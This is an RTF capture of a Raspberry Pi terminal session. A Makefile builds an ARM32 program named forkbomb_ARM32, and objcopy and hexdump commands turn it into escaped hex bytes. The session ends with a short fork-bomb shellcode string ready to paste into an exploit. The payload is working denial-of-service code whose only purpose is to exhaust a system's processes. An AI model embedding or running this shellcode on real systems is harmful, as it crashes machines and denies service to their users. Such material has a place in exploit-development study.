{\rtf1\ansi\ansicpg1252\cocoartf1671\cocoasubrtf600
{\fonttbl\f0\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red26\green26\blue26;\red254\green254\blue254;}
{\*\expandedcolortbl;;\cssrgb\c13333\c13333\c13333;\cssrgb\c99608\c99608\c99608;}
\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs20 \cf2 \cb3 \expnd0\expndtw0\kerning0
pi@raspberrypi:~ cat Makefile\cb1 \
\cb3 forkbomb_ARM32:  forkbomb_ARM32.o\cb1 \
\cb3 ld forkbomb_ARM32.o -o forkbomb_ARM32\cb1 \
\cb3 forkbomb_ARM32.o:  forkbomb_ARM32.s\cb1 \
\cb3 as forkbomb_ARM32.s -o forkbomb_ARM32.o\cb1 \
\cb3 clean:\cb1 \
\cb3 rm *.o forkbomb_ARM32\cb1 \
\cb3 pi@raspberrypi:~ make\cb1 \
\cb3 pi@raspberrypi:~ objcopy -O binary forkbomb_ARM32 forkbomb_ARM32.bin\cb1 \
\cb3 pi@raspberrypi:~ hexdump -v -e '"\\\\""x" 1/1 "%02x" ""' forkbomb_ARM32.bin && echo\cb1 \
\cb3 \\x01\\x30\\x8f\\xe2\\x13\\xff\\x2f\\xe1\\x7f\\x40\\x02\\x27\\x01\\xdf\\xc0\\x46\\xff\\xf7\\xfa\\xff}